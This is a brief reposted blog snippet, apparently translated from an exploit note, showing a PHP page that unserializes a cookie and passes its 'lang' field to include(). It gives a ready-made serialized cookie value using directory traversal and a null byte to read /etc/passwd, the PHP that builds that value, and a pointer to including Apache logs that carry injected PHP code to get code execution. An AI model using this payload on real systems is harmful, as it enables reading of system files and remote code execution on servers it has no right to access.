本文共 498 字,大约阅读时间需要 1 分钟。
<?php $settings=unserialize($_COOKIE[user_settings]); include("include/lang/".$settings['lang'].".php"); ?> quite obvious, you need to set a cookie like this: user_settings=a:1:{s:4:"lang";s:32:"../../../../../../../etc/passwd[null char]";} it is the result of: [code lang=php] <?php $settings=array(); $settings['lang']="../../../../../../../etc/passwd/x00"; $settings=serialize($settings); echo $settings; ?> [/code] the same with apache logs or something... where you have injected some php code转载地址:http://kummb.baihongyu.com/